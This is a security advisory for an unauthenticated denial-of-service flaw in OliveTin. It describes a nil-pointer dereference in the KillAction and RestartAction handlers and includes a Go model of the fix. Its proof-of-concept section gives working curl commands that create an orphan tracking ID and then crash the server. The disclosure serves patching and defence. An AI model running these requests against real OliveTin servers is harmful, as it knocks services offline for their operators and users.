5.3
OliveTin allows unauthenticated server crashes by exploiting invalid API calls
GHSA-fwhj-785h-43hh
Summary
An attacker can crash OliveTin servers by creating a log entry with an invalid action ID and then calling KillAction or RestartAction. This causes repeated server crashes, potentially leading to a denial of service. To fix this, update to a patched version of OliveTin or apply a custom fix to validate action IDs before creating log entries.
What to do
- Update olivetin (github.com) to version 0.0.0-20260304225158-bb14c5da3e64.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| github.com | olivetin | <= 0.0.0-20260304225158-bb14c5da3e64 | 0.0.0-20260304225158-bb14c5da3e64 |
Original title
OliveTin has crash on NPE by calling APIs with invalid bindings or log references
Original description
### Summary
An unauthenticated attacker can trigger server-side panics by first creating an execution log entry with a nil binding via `StartActionByGet` (invalid action ID), then calling `KillAction` or `RestartAction` on that tracking ID. This causes a nil-pointer dereference in API handlers and results in repeated per-request panics (`Empty reply from server`), enabling denial of service through panic/log/CPU amplification.
### Details
The issue is caused by this flow:
1. `StartActionByGet` accepts an arbitrary `actionId` and still calls the executor:
- `service/internal/api/api.go:239`
2. Executor stores a log entry before binding validation:
- `service/internal/executor/executor.go:519`
3. If binding is nil, execution stops, but the log entry remains:
- `service/internal/executor/executor.go:781`
4. `KillAction` dereferences `execReqLogEntry.Binding.Action` without checking `Binding`:
- `service/internal/api/api.go:79`
5. `RestartAction` has the same unsafe dereference:
- `service/internal/api/api.go:1285`
Because the dereference happens before authorization checks in these handlers, this is reachable unauthenticated.
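To make the two fixes concrete, here is a constructed Go model of the flow above (added here; it is not OliveTin's code, and its types, names and tracking-ID format are assumptions): the vulnerable start path stores the log entry before the binding exists, the fixed path validates the action ID first, and the kill handler checks for a nil binding before using it.

```go
package main

import (
	"errors"
	"fmt"
)

// Simplified model of the advisory's flow (constructed; not OliveTin's code).
type Binding struct{ Action string }
type LogEntry struct{ Binding *Binding } // nil Binding == orphan entry
type Executor struct {
	actions map[string]bool // known action IDs
	logs    map[string]*LogEntry
}

// StartVulnerable logs the entry before resolving the binding, so an unknown
// actionID leaves an orphan entry with a nil Binding (advisory steps 2-3).
func (e *Executor) StartVulnerable(actionID string) string {
	tid := fmt.Sprintf("track-%d", len(e.logs)+1)
	entry := &LogEntry{}
	e.logs[tid] = entry // stored whether or not the action exists
	if e.actions[actionID] {
		entry.Binding = &Binding{Action: actionID}
	}
	return tid
}

// StartFixed validates the action ID first, so no orphan entry is ever logged.
func (e *Executor) StartFixed(actionID string) (string, error) {
	if !e.actions[actionID] {
		return "", errors.New("unknown action id")
	}
	tid := fmt.Sprintf("track-%d", len(e.logs)+1)
	e.logs[tid] = &LogEntry{Binding: &Binding{Action: actionID}}
	return tid, nil
}

// KillAction (and RestartAction alike) must check the entry and its Binding
// before use; here a nil Binding is an error, not a panic (advisory step 4).
func (e *Executor) KillAction(tid string) (string, error) {
	entry, ok := e.logs[tid]
	if !ok {
		return "", errors.New("unknown tracking id")
	}
	if entry.Binding == nil {
		return "", errors.New("orphan log entry: no binding to act on")
	}
	return entry.Binding.Action, nil
}
```

Both checks together remove the crash: the fixed start path never creates the orphan entry, and the defensive handler still tolerates any orphan that an older log might contain.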
### PoC
Environment:
- OliveTin default single frontend on `http://localhost:1337`
- Reproduced on `main` (commit `235493e`) and tag `3000.11.0`
1. Create an orphan tracking ID with an invalid action:
```bash
T=$(curl -s -X POST http://localhost:1337/api/StartActionByGet \
  -H 'Content-Type: application/json' \
  --data '{"actionId":"does-not-exist"}' \
  | sed -n 's/.*"executionTrackingId":"\([^"]*\)".*/\1/p')
echo "$T"
```
2. Trigger the panic in RestartAction:
```bash
curl -v -X POST http://localhost:1337/api/RestartAction \
  -H 'Content-Type: application/json' \
  --data "{\"executionTrackingId\":\"$T\"}"
```
3. Trigger the panic in KillAction:
```bash
curl -v -X POST http://localhost:1337/api/KillAction \
  -H 'Content-Type: application/json' \
  --data "{\"executionTrackingId\":\"$T\"}"
```
Observed client output:
- `curl: (52) Empty reply from server`
Observed server log:
- `panic serving ... runtime error: invalid memory address or nil pointer dereference`
- stack points to:
  - `service/internal/api/api.go:79` (KillAction)
  - `service/internal/api/api.go:1285` (RestartAction)
### Impact
This is an unauthenticated denial-of-service vulnerability (panic-based request disruption and log/CPU amplification). An attacker can repeatedly trigger panics remotely without credentials, degrading service reliability and observability.
CVSS 3.1 (GHSA): 5.3
Vulnerability type
- CWE-20: Improper Input Validation
- CWE-476: NULL Pointer Dereference
Published: 5 Mar 2026 · Updated: 7 Mar 2026 · First seen: 6 Mar 2026